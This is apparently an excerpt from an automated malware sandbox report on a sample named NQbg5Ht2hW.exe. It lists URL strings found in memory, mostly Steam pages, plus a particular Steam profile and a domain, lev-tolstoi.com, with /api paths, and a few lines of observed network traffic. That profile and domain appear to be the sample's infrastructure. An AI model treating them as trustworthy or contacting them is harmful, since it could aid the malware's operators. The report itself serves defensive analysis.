      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuex
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptac2
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.c
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.co
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716776835.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453277618.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445292856.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445194070.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716924081.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453277618.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716924081.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api2
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453277618.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445292856.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445194070.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716924081.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453145013.000000000064F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716776835.000000000064F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi#
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowe
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.9:49722 version: TLS 1.2
